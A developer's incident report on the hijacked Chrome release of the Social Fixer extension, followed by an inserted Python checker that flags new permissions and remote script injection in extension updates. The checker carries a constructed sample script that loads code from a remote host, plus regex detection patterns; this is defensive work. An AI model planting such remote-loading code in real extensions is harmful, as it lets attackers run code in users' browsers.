CHROME EXTENSION HACKING UPDATE: First, I apologize for any confusion, inconvenience, and concern that this event has caused. The safety of my users is top priority to me and I take it very seriously. I have worked hard to resolve this quickly and correctly. Below is a detailed technical summary.
TL;DR Summary: The hacked Chrome version of Social Fixer was removed from the Web Store. There is no evidence of any harm done to any users, and there is currently no known risk. Nothing needs to be done by you.
UPDATE! The original extension is now back under my control, and I have published version 20.2.0 on July 5. This is an official release that is safe to install. If you had Social Fixer previously disabled, it may automatically re-enable itself. Otherwise, you may need to re-install from the Chrome Web Store. Thank you to the people at Google for the quick response!
1) My personal Google account was hacked. I have since taken every step possible to secure my account from further threats and I am confident that this cannot happen again. Using my personal account, the attacker was able to update a new version of Social Fixer to the Chrome Web Store and publish it for all users.
2) Chrome auto-updates extensions, so all Chrome users got the updated, hacked extension automatically. The code was completely changed, and required additional permissions that Social Fixer does not require. For this reason, it was disabled for all users by default, and users were prompted to accept the new permissions before enabling (a good feature of Chrome!). If you did not accept the new permissions, you were never delivered the updated extension and there was no risk. If you did accept the new permissions, your extension automatically updated with the new code.
3) While the slow Firefox approval process is annoying to me at times, every extension update is reviewed by a human. This is not the case for Google Chrome. Extension updates are automatically approved after some simple automated checks. This allowed the updated extension - which was clearly not legitimate code - to be published without review. This is a limitation of the Chrome process, and could never have happened to the Firefox extension (or Opera or Safari). There is no mechanism in place that would have prevented the publishing of this malicious code.
4) On the morning of July 3, I was alerted by several users that Social Fixer had updated to version 20.1.1 (from the actual published version 20.1.0) and was asking for new permissions. As soon as I heard this, I checked my account and discovered the logins from Russia and the fact that the extension was now under someone else's control. I immediately changed my password, updated my security settings, de-authorized all apps using my credentials, and logged out all sessions. My account is now secured using every available mechanism. I also contacted Google through their official feedback tool and requested that they shut down the extension immediately.
5) Google replied to me within a couple of hours to say that my request was received. However, the hacker had changed my Gmail settings to prevent me from seeing any emails related to Chrome or this extension. I discovered this later in the day and was able to recover the emails that were hidden from me.
6) I inspected the hacker's code inside the updated extension and found nothing that was dangerous to users. Its only purpose was to inject code from a remote server, and the injected code only ran Google Analytics. The end result was that it was keeping track of which sites users visited, but not capturing any private data. This may have just been a preliminary step by the hacker to measure how many users they had access to. There is no indication that the injected code was updated at any time to do anything different.
7) The hacked extension loaded code from unpkg.com using dynamically-generated URLs. That site was very helpful in reducing the impact of the threat by updating their code quickly to blacklist the URLs being generated. So even if the hijacked extension was installed in your browser, this move prevented it from actually loading any code or doing anything.
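As an added illustration (not Social Fixer's code and not the attacker's), here is a small Python reviewer that applies the two checks items 2 and 7 describe to an extension update: new manifest permissions that would trigger Chrome's disable-and-prompt, and hard-coded remote hosts combined with script-injection calls. The manifests and the background script are constructed samples in the style of the incident, not the real 20.1.1 code.

```python
import json
import re

# Constructed sample manifests: the published 20.1.0 and a hypothetical hijacked 20.1.1.
MANIFEST_OLD = json.dumps({
    "manifest_version": 2, "name": "Social Fixer", "version": "20.1.0",
    "permissions": ["storage", "*://*.facebook.com/*"],
})
MANIFEST_NEW = json.dumps({
    "manifest_version": 2, "name": "Social Fixer", "version": "20.1.1",
    "permissions": ["storage", "<all_urls>", "tabs", "webRequest"],
})

# Constructed snippet in the style of a background script that loads remote code.
BACKGROUND_JS = """
var host = 'https://unpkg.com/';
var s = document.createElement('script');
s.src = host + pkg + '@' + ver + '/loader.js';
document.head.appendChild(s);
"""

REMOTE_URL = re.compile(r"https?://[^\s'\"]+")
INJECT_API = re.compile(r"createElement\(['\"]script['\"]\)|\beval\(|new Function\(|\.src\s*=")

def new_permissions(old_manifest: str, new_manifest: str) -> list[str]:
    """Permissions in the update that the published version did not declare.
    For permissions that carry a warning, this is what makes Chrome disable the
    updated extension and prompt the user, as described in item 2."""
    old = set(json.loads(old_manifest).get("permissions", []))
    new = set(json.loads(new_manifest).get("permissions", []))
    return sorted(new - old)

def remote_code_indicators(source: str) -> dict:
    """Hard-coded remote hosts and script-injection calls in extension JavaScript."""
    hosts = sorted({u.split("/")[2] for u in REMOTE_URL.findall(source)})
    injections = [m.group(0) for m in INJECT_API.finditer(source)]
    return {"remote_hosts": hosts, "injection_calls": injections}

def review_update(old_manifest: str, new_manifest: str, *sources: str) -> list[str]:
    """Human-readable findings for an update; an empty list means nothing was flagged."""
    findings = []
    added = new_permissions(old_manifest, new_manifest)
    if added:
        findings.append(f"new permissions (user will be prompted): {', '.join(added)}")
    for src in sources:
        ind = remote_code_indicators(src)
        if ind["remote_hosts"] and ind["injection_calls"]:
            findings.append(f"remote script loading from {', '.join(ind['remote_hosts'])}")
    return findings
```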
8) After multiple attempts to contact Google through different means, no action had been taken by the afternoon of July 3. I resorted to Twitter to try to get hold of anyone who could escalate this. I finally reached someone by the evening and was able to have a late-night email exchange with people who work in security with Chrome to start the resolution. I supplied them with a detailed account of what happened.
9) By the morning of July 4, the hacked extension had been disabled in the Chrome Store by Google. No more users can be automatically updated with the bad code, and it is not available for new users. The threat has been fully neutralized.
10) I do not yet have access to my original extension ID to update it. This means that I cannot publish an update that automatically gets rolled out to all users. I am hoping that I can retain this extension ID so I don't lose all ~200k users or the thousands of positive reviews. The worst case is that I need to release a new version of the extension under a new ID, so all Chrome users would need to install from scratch.
11) If you haven't backed up your preferences using the feature built into Social Fixer, then there is no easy way to access them or transfer them to other browsers. Your prefs should not be lost, but they won't be restored unless I can recover the old extension ID and publish an update.
12) Just to be clear, no browsers except Chrome (or derivatives that use the Chrome Web Store) were affected by this. No vulnerabilities were exploited in the Social Fixer code or its functionality. The SocialFixer.com web site was not affected. The only security breach was in my personal Google account, which is used to upload extension updates. That has been fully secured, and this type of attack is no longer possible.
13) Social Fixer is not an isolated instance of this kind of hacking. In the past month, other popular extensions such as The Great Suspender, Infinity New Tab, and Betternet have all been victims of similar attacks through the Chrome Store. There is an ongoing coordinated effort to exploit any possible vulnerability in browsers, and extensions seem to be a popular target. This means I need to have even greater diligence in my procedures, which I am prepared to do.
I appreciate all your patience and understanding while I handled this as quickly and thoroughly as possible. I hope that this update gives you more than enough detail to know that I took this very seriously, and that you can trust me personally and the Social Fixer extension going forward. I will always work to protect your security and privacy, while delivering the best functionality I can provide.
I will announce when the safe and updated Chrome extension is once again available.